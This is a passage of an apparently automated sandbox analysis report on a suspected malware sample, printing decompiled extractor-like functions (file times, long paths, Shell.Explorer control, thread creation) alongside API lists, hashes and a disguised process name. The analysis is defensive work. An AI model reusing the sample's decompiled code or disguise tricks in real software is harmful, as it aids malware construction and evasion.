							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00169ECF(_t108 - 0x203c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x203c);
								_push(0);
								_t68 = E00163B3D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E001696D0(_t108 - 0x203c);
								}
							}
							E00169619(_t108 - 0x50ac);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t62 = E001699B0(_t108 - 0x50ac, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x50a8), _t108 - 0x205c, _t108 - 0x2054, _t108 - 0x204c);
								}
							}
							E0016A444(_t106,  *(_t108 - 0x207c));
							E00169653(_t108 - 0x50ac, _t106);
							_t90 = _t108 - 0x203c;
						} else {
							E00169619(_t108 - 0x60d4);
							_push(1);
							_push(_t108 - 0x60d4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00163B3D(_t81, _t99);
							_t90 = _t108 - 0x60d4;
						}
						_t61 = E00169653(_t90, _t106);
					} else {
						E00161F94(_t113, 0x53, _t81 + 0x24, _t106);
						_t61 = E00166FC6(0x1a0f50, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E0016FE56(_t108 - 0x1014, 0x193760, 0x802);
					E0016FE2E(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x0016772b
0x00167730
0x0016773a
0x00167741
0x0016774a
0x00167779
0x00167779
0x00167787
0x0016778c
0x0016778c
0x0016779c
0x001677a1
0x001677a9
0x001677c8
0x001677cc
0x00167809
0x00167814
0x00167821
0x00167824
0x00167829
0x0016782f
0x00167832
0x00167835
0x00167837
0x0016783c
0x0016783c
0x00167847
0x00167854
0x00167862
0x00167867
0x00167869
0x0016786b
0x00167874
0x00167875
0x00167876
0x0016787b
0x0016787d
0x00167885
0x00167885
0x0016787d
0x00167890
0x00167895
0x00167899
0x0016789d
0x001678a8
0x001678ad
0x001678af
0x001678cc
0x001678cc
0x001678af
0x001678d9
0x001678e4
0x001678e9
0x001677ce
0x001677d4
0x001677d9
0x001677e3
0x001677e4
0x001677e7
0x001677ea
0x001677ef
0x001677ef
0x001678ef
0x001677ab
0x001677b2
0x001677be
0x001677be
0x001678fa
0x00167904
0x00167904
0x0016774c
0x00167750
0x00000000
0x00167752
0x00167752
0x00167764
0x00167772
0x00000000
0x00167772

APIs

__EH_prolog.LIBCMT ref: 00167730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001678CC

Part of subcall function 0016A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0016A27A,?,?,?,0016A113,?,00000001,00000000,?,?), ref: 0016A458
Part of subcall function 0016A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0016A27A,?,?,?,0016A113,?,00000001,00000000,?,?), ref: 0016A489

Strings

:, xrefs: 001677A1

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 6fabff92028bd744ea05030de7ba3368bc0b1b2a0e51d04e9bf22736714f34f7
Instruction ID: 314e1a97a18c7ef631913c2dd9177fbf56430c07bd338ef7515bde063a6c5300
Opcode Fuzzy Hash: 6fabff92028bd744ea05030de7ba3368bc0b1b2a0e51d04e9bf22736714f34f7
Instruction Fuzzy Hash: 6741A871805258AADB24EB50DD49EEEB3BCEF55304F0040DAB609A30D2DB745F94CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0016B66C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0016B66C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E0017E360();
				_t71 = _a4;
				if( *_t71 != 0) {
					E0016B806(_t71);
					_t66 = E001835B3(_t71);
					_t30 = E0016B832(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E0016B90D( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E0016B207(__eflags,  &_v4100, 0x800);
							_t39 = E001835B3( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E0016FE56(_a8, L"\\\\?\\", _t69);
							E0016FE2E(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E0016B90D(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E0016FE2E(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E0016FE56(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E0016FE2E(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E0016B806(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E0016FE56(_a8, L"\\\\?\\", _t73);
						E0016FE2E(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E0016FE56(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x0016b674
0x0016b67a
0x0016b681
0x0016b68d
0x0016b69a
0x0016b69c
0x0016b6a1
0x0016b6a3
0x0016b729
0x0016b72f
0x0016b731
0x0016b7f0
0x0016b7f0
0x0016b7f0
0x0016b7f2
0x00000000
0x0016b7f3
0x0016b737
0x0016b739
0x00000000
0x00000000
0x0016b748
0x0016b74a
0x0016b78f
0x0016b79b
0x0016b7a5
0x0016b7a9
0x0016b7ab
0x00000000
0x00000000
0x0016b7b6
0x0016b7c6
0x0016b7cb
0x0016b7cf
0x0016b7db
0x0016b7dd
0x0016b7df
0x0016b7df
0x0016b7df
0x0016b7dd
0x0016b7e2
0x0016b7e2
0x0016b7e3
0x0016b7e3
0x0016b7e4
0x0016b7e4
0x0016b7e7
0x0016b7ec
0x00000000
0x0016b7ec
0x0016b74c
0x0016b74f
0x0016b752
0x0016b754
0x00000000
0x00000000
0x0016b763
0x0016b76a
0x0016b77c
0x00000000
0x0016b77c
0x0016b6a6
0x0016b6ab
0x0016b6ad
0x0016b6d5
0x0016b6d6
0x0016b6d9
0x00000000
0x00000000
0x0016b6df
0x0016b6e2
0x0016b6e5
0x00000000
0x00000000
0x0016b6eb
0x0016b6ee
0x0016b6f1
0x0016b6f3
0x00000000
0x00000000
0x0016b702
0x0016b710
0x0016b715
0x0016b716
0x00000000
0x0016b716
0x0016b6af
0x0016b6b2
0x0016b6b5
0x00000000
0x00000000
0x0016b6c6
0x0016b6cb
0x00000000
0x0016b683
0x0016b683
0x0016b7f4
0x0016b7f8
0x0016b7f8

Strings

UNC, xrefs: 0016B708
\\?\, xrefs: 0016B6BE, 0016B6FA, 0016B75B, 0016B7AE

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 877ab3b0f215cca9dda303af9fe9102cc4fc245658c486be0925fd8e12dc9933
Instruction ID: d609c17dad21e9317d0dde90bd22d6b0085ec0fb68070c284a49f4f02818f6e1
Opcode Fuzzy Hash: 877ab3b0f215cca9dda303af9fe9102cc4fc245658c486be0925fd8e12dc9933
Instruction Fuzzy Hash: C941C235444219BACF20AF25DCC5EEB7BADAF51750B114029F814E7192E771DAE1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00178FB6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00178FB6(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t58;

				_t50 = __edi;
				_t34 = _t35;
				_t53 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t53;
				_t21 = E0017E24A(__edx, _t53, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E001787EE(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t53;
					E0017980F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E00179A6E();
					E00179A04( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E00179901( *((intOrPtr*)(_t34 + 0xc)));
					_t58 = _t26;
					if(_t58 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E00178A06(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t54 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0x193260(_t28);
							_t26 =  *((intOrPtr*)(_t54 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0x193260(_t58, 0x19541c, _t30, _t50);
					_t32 =  *((intOrPtr*)( *( *_t58)))();
					 *0x193260(_t58);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}

0x00178fb6
0x00178fb8
0x00178fbb
0x00178fc1
0x00178fc4
0x00178fc9
0x00178fd0
0x00178fdb
0x00178fdb
0x00178fd2
0x00178fd4
0x00178fd4
0x00178fdd
0x00178fe2
0x00179095
0x00178fe8
0x00178fe9
0x00178ff4
0x00178ffc
0x00178ffe
0x00179008
0x00179010
0x00179015
0x00179019
0x0017905a
0x0017905a
0x0017905e
0x00179062
0x00179067
0x0017906c
0x0017906f
0x00179070
0x00179073
0x00179075
0x00179076
0x00179077
0x0017907b
0x00179082
0x0017907d
0x0017907d
0x0017907d
0x00179088
0x0017908e
0x0017908e
0x00179091
0x00000000
0x00179091
0x0017901e
0x0017901e
0x0017902d
0x00179031
0x00179037
0x00179044
0x0017904a
0x0017904f
0x00000000
0x00000000
0x00179051
0x00179055
0x00000000
0x00179055

APIs

new.LIBCMT ref: 00178FC4

Strings

about:blank, xrefs: 00179082
Shell.Explorer, xrefs: 00178FEF

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: f04a1ba237d39fb83865c086d3ed034f4ee91dacee87bc538a087b095d797f69
Instruction ID: f8207f9e4b4d5e3d0c1d4b307764f5ceeea07622d790dd6461901b030715cfb6
Opcode Fuzzy Hash: f04a1ba237d39fb83865c086d3ed034f4ee91dacee87bc538a087b095d797f69
Instruction Fuzzy Hash: 36216D712542049FCB089F68C899A2A77B9FF98721B15C56EF81D8B286DB70EC05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0016EBF2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0016EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0016EB92
Part of subcall function 0016EB73: GetProcAddress.KERNEL32(001A81C0,CryptUnprotectMemory), ref: 0016EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0016EBEC), ref: 0016EC84

Strings

CryptProtectMemory failed, xrefs: 0016EC3B
CryptUnprotectMemory failed, xrefs: 0016EC7C

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 357cd7a0efa0ef0460dbac10bff8cb944c5db9c17095125079ccc2f1a23801e3
Instruction ID: 9f09735098c2bf43e7cc0ddfc0d3e5f359a6cab977f28500204e62e0dff5fbd0
Opcode Fuzzy Hash: 357cd7a0efa0ef0460dbac10bff8cb944c5db9c17095125079ccc2f1a23801e3
Instruction Fuzzy Hash: A3117D35A05224AFDF159F34DD06A7F3B94EF05720B05831AFC056B291DB35AEA187D4

Uniqueness

Uniqueness Score: -1.00%

Function 00170889, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
threadCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00170889() {
				long _v4;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t5;
				int _t8;
				void* _t12;
				void** _t18;
				void* _t22;

				_t12 = 0;
				if( *0x1a0f50 > 0) {
					_t18 = 0x1a0f54;
					do {
						_t22 = CreateThread(0, 0x10000, E001709D0, 0x1a0f50, 0,  &_v4);
						if(_t22 == 0) {
							_push(L"CreateThread failed");
							_push(0x1a0f50);
							E00166E8C(E0017F190(E00166E91(0x1a0f50)), 0x1a0f50, 0x1a0f50, 2);
						}
						 *_t18 = _t22;
						 *0x001A1054 =  *((intOrPtr*)(0x1a1054)) + 1;
						_t8 =  *0x1a81d8; // 0x0
						if(_t8 != 0) {
							_t8 = SetThreadPriority( *_t18, _t8);
						}
						_t12 = _t12 + 1;
						_t18 =  &(_t18[1]);
					} while (_t12 <  *0x1a0f50);
					return _t8;
				}
				return _t5;
			}

0x0017088e
0x00170892
0x00170896
0x00170899
0x001708b3
0x001708b7
0x001708b9
0x001708be
0x001708db
0x001708db
0x001708e0
0x001708e2
0x001708e8
0x001708ef
0x001708f4
0x001708f4
0x001708fa
0x001708fb
0x001708fe
0x00000000
0x00170903
0x00170907

APIs

CreateThread.KERNEL32(00000000,00010000,001709D0,?,00000000,00000000), ref: 001708AD
SetThreadPriority.KERNEL32(?,00000000), ref: 001708F4

Part of subcall function 00166E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00166EAF

Strings

CreateThread failed, xrefs: 001708B9

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 65354f7033679bcd63e0ad484615993149db44d9d19cdc5a0e287dfb3f5eb2e4
Instruction ID: e506f9df822db8e567c6f6857cd22377c858fec1a71079656dc14edd745680aa
Opcode Fuzzy Hash: 65354f7033679bcd63e0ad484615993149db44d9d19cdc5a0e287dfb3f5eb2e4
Instruction Fuzzy Hash: 8201F9B5344305AFD725AF64EC81F6673A8EB59715F10013EF68AA6180CFA2B8819664

Uniqueness

Uniqueness Score: -1.00%

Function 0016130B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0016130B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E0016DA71(0x1a0ee8, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E0016DA98(0x1a0ee8, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x1c2154(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x1935b4);
								}
							}
						}
					}
				}
				return 0;
			}

0x00161312
0x00161375
0x00161314
0x00161314
0x0016131b
0x00161331
0x0016133a
0x0016133f
0x00161347
0x0016134f
0x00161357
0x00161365
0x00161365
0x00161357
0x00161347
0x0016133a
0x0016131b
0x0016137d

APIs

Part of subcall function 0016DA98: _swprintf.LIBCMT ref: 0016DABE
Part of subcall function 0016DA98: _strlen.LIBCMT ref: 0016DADF
Part of subcall function 0016DA98: SetDlgItemTextW.USER32(?,0019E154,?), ref: 0016DB3F
Part of subcall function 0016DA98: GetWindowRect.USER32(?,?), ref: 0016DB79
Part of subcall function 0016DA98: GetClientRect.USER32(?,?), ref: 0016DB85

GetDlgItem.USER32(00000000,00003021), ref: 0016134F
SetWindowTextW.USER32(00000000,001935B4), ref: 00161365

Strings

0, xrefs: 0016130E

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f32dd40799b0c7744fa3b10b3b85c11127c1af60344bed78ca2b98337e2b3aef
Instruction ID: e1d5e98e3de38617355bd6b7298c639c98609a5a2af48efe2b1d83450c39577a
Opcode Fuzzy Hash: f32dd40799b0c7744fa3b10b3b85c11127c1af60344bed78ca2b98337e2b3aef
Instruction Fuzzy Hash: B8F0AF7410428CBBDF260F608C09BFA3F98BB25315F0C8414FD4A55AB1C774C9A5EB54

Uniqueness

Uniqueness Score: -1.00%

Function 0017084E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0017084E(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E00166E8C(E00166E91(_t6, 0x1a0f50, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x1a0f50, 0x1a0f50, 2);
				}
				return _t2;
			}

0x0017084e
0x00170854
0x0017085d
0x00170866
0x00000000
0x00170885
0x00170886

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00170A78,?), ref: 00170854
GetLastError.KERNEL32(?), ref: 00170860

Part of subcall function 00166E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00166EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00170869

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 0f158f6a486f9c1bd77772321885bdc883979f18b10ef05b4c1b753e7e307fc7
Instruction ID: f069d4b449f3fa3c09eabacd1e1d9629c83acdff66f8ed7925b7ea74db518edb
Opcode Fuzzy Hash: 0f158f6a486f9c1bd77772321885bdc883979f18b10ef05b4c1b753e7e307fc7
Instruction Fuzzy Hash: 43D05E35A0812067CB112764AC0ADAF79199F62730F244719F23D651F5DB221AA182E6

Uniqueness

Uniqueness Score: -1.00%

Function 0016DA4E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0016DA4E(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}

0x0016da51
0x0016da61
0x0016da69
0x0016da6b
0x00000000
0x0016da6b
0x0016da70

APIs

GetModuleHandleW.KERNEL32(00000000,?,0016D32F,?), ref: 0016DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0016D32F,?), ref: 0016DA61

Strings

RTL, xrefs: 0016DA5B

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 8cca8470c7c569c0467b2a39f6c54d6211e9dcb9185fea0ebc409841fa97e591
Instruction ID: 300f0c1d3c57bbf425414d3accced90346cb3883c28820e65dcd5d84762bdb51
Opcode Fuzzy Hash: 8cca8470c7c569c0467b2a39f6c54d6211e9dcb9185fea0ebc409841fa97e591
Instruction Fuzzy Hash: E4C012327893A0B6EB3027607C0DB832A486B10B12F09044EB251DA5D0DAE6CA8086A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: sessionhostmonitorSavesruntimeNet.exe PID: 5168 Parent PID: 1556 sessionhostmonitorSavesruntimeNet.exeCOMMON

Executed Functions

Function 00007FFA35C5EDC6, Relevance: 3.0, Strings: 2, Instructions: 474COMMON

Download Yara Rule

Strings

Y$|s, xrefs: 00007FFA35C5F25B
Y$|s, xrefs: 00007FFA35C5EE38

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: Y$|s$Y$|s
API String ID: 0-339508147
Opcode ID: 4e5b9fe7ee28386d33399de27d702e437d6908cd1062b2f9410c4a1303bfa6fa
Instruction ID: 4f1dc0b378c088ce23803020ae26850c98b7b8a3b3f31d7b7fb5007fe5dc7e07
Opcode Fuzzy Hash: 4e5b9fe7ee28386d33399de27d702e437d6908cd1062b2f9410c4a1303bfa6fa
Instruction Fuzzy Hash: 68F1B171908A8E8FEBA8DF28C8467E937D1FF55305F04867AE84DC7291CF75A8418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C5FB72, Relevance: 3.0, Strings: 2, Instructions: 460COMMON

Download Yara Rule

Strings

Y$|s, xrefs: 00007FFA35C5FFD7
Y$|s, xrefs: 00007FFA35C5FBE8

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: Y$|s$Y$|s
API String ID: 0-339508147
Opcode ID: 4d706ace45cc48a3a125e16cd694979d50208be0a1a465430ff98e9bee2d4e57
Instruction ID: df67b202c749353456d2f9ea6598ac1b00e3197aabe8d14ca93f703b631b0794
Opcode Fuzzy Hash: 4d706ace45cc48a3a125e16cd694979d50208be0a1a465430ff98e9bee2d4e57
Instruction Fuzzy Hash: ADE1E271908A8E8FEBA8DF28C8567E937D1FF55711F04867ED84DC7291CE79A8408B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C64D3B, Relevance: 3.8, Strings: 3, Instructions: 47COMMON

Download Yara Rule

Strings

=, xrefs: 00007FFA35C65AC8
m, xrefs: 00007FFA35C64D5E
s, xrefs: 00007FFA35C65BF4

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: =$m$s
API String ID: 0-3358075408
Opcode ID: 1209b9f6fc2dffb744674f19145124a1a7fa735090b6959a7bcd505dc8bcac4f
Instruction ID: 1ff7734989890f4f903c43c2baf63b43b1ec698713e808b02f7ed0f8bb8f3da7
Opcode Fuzzy Hash: 1209b9f6fc2dffb744674f19145124a1a7fa735090b6959a7bcd505dc8bcac4f
Instruction Fuzzy Hash: 60113D3590821A8FEB94DF08C8A06B873B1FF55709F14816AD40DD7281EF79AA81EB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA35C64DEC, Relevance: 2.5, Strings: 2, Instructions: 37COMMON

Download Yara Rule

Strings

4, xrefs: 00007FFA35C64F6B
S, xrefs: 00007FFA35C64DEC

Memory Dump Source

Source File: 0000000A.00000002.704510063.00007FFA35C50000.00000040.00000001.sdmp, Offset: 00007FFA35C50000, based on PE: false

Similarity

API ID:
String ID: 4$S
API String ID: 0-3752424886
Opcode ID: cc274c1705cbf0c12d5cd2dfb8b4730e4f2f4a4ece16f7dc2f3007afefd6683e
